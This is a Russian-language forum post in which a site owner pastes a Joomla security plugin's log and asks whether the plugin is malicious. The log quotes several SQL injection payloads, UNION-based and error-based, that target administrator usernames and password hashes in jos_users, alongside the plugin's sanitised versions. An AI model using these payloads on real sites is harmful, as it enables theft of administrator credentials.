Добрый день! Google пометил сайт как содержащий угрозу. Начал проверять разными сканерами, и один из них нашёл вот такой файл jhackguard-log.php в папке /log/
Я не пойму: то ли сам плагин jhackguard что-то не то делает, то ли он это в лог писал?
2013-12-26T06:46:45+00:00 CRITICAL jhackguard Changed GET value from: %' and 1=2) union select 1,group_concat(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,0x3C62723E,0x3C6B6579733E),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from jos_users where usertype='Super Administrator' or usertype='Administrator' -- ; to: %' and 1=2) union select 1,group_(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,0x3C62723E,0x3C6B6579733E),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from where usertype='Super ' usertype='Administrator' -- ;
2013-12-26T19:17:06+00:00 CRITICAL jhackguard Changed GET value from: %' and 1=2) union select 1,group_concat(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,0x3C62723E,0x3C6B6579733E),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from jos_users where usertype='Super Administrator' or usertype='Administrator' -- ; to: %' and 1=2) union select 1,group_(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,0x3C62723E,0x3C6B6579733E),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from where usertype='Super ' usertype='Administrator' -- ;
2013-12-28T07:06:25+00:00 CRITICAL jhackguard Changed GET value from: -62 union select 1,2,password,4,5,6,7,8,9,10,11,12,group_concat(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,block,0x3a,activation,0x3a,0x3C62723E,0x3C6B6579733E),14,15,16,17,18,19,20,21,22,23,24,25,26,27 from jos_users where usertype='Super Administrator' or usertype='Administrator' -- to: -62 union select 1,2,password,4,5,6,7,8,9,10,11,12,group_(0x3C6B65793E,username,0x3a,password,0x3a,usertype,0x3a,block,0x3a,activation,0x3a,0x3C62723E,0x3C6B6579733E),14,15,16,17,18,19,20,21,22,23,24,25,26,27 from where usertype='Super ' usertype='Administrator' --
2014-01-02T22:56:34+00:00 CRITICAL jhackguard Changed GET value from: (select 1 from(select count(*),concat((select username from jos_users where usertype=0x73757065722061646d696e6973747261746f72 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) to: (select 1 from(select count(*),((select username from where usertype=0x73757065722061646d696e6973747261746f72 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
2014-01-15T21:21:00+00:00 CRITICAL jhackguard Changed COOKIE value from:60476600.1389787523.1.1.utmcsr=rambler|utmccn=(organic)|utmcmd=organic|utmctr=линия текст текст текст to:
2014-01-15T21:22:28+00:00 CRITICAL jhackguard Changed COOKIE value from:60476600.1389787523.1.1.utmcsr=rambler|utmccn=(organic)|utmcmd=organic|utmctr=линия текст текст текст to:
2014-01-15T21:27:10+00:00 CRITICAL jhackguard Changed COOKIE value from:60476600.1389787523.1.1.utmcsr=rambler|utmccn=(organic)|utmcmd=organic|utmctr=линия текст текст текст to:
2014-01-15T21:30:00+00:00 CRITICAL jhackguard Changed COOKIE value from:60476600.1389787523.1.1.utmcsr=rambler|utmccn=(organic)|utmcmd=organic|utmctr=линия текст текст текст to:
2014-01-15T21:32:28+00:00 CRITICAL jhackguard Changed COOKIE value from:60476600.1389787523.1.1.utmcsr=rambler|utmccn=(organic)|utmcmd=organic|utmctr=линия текст текст текст to: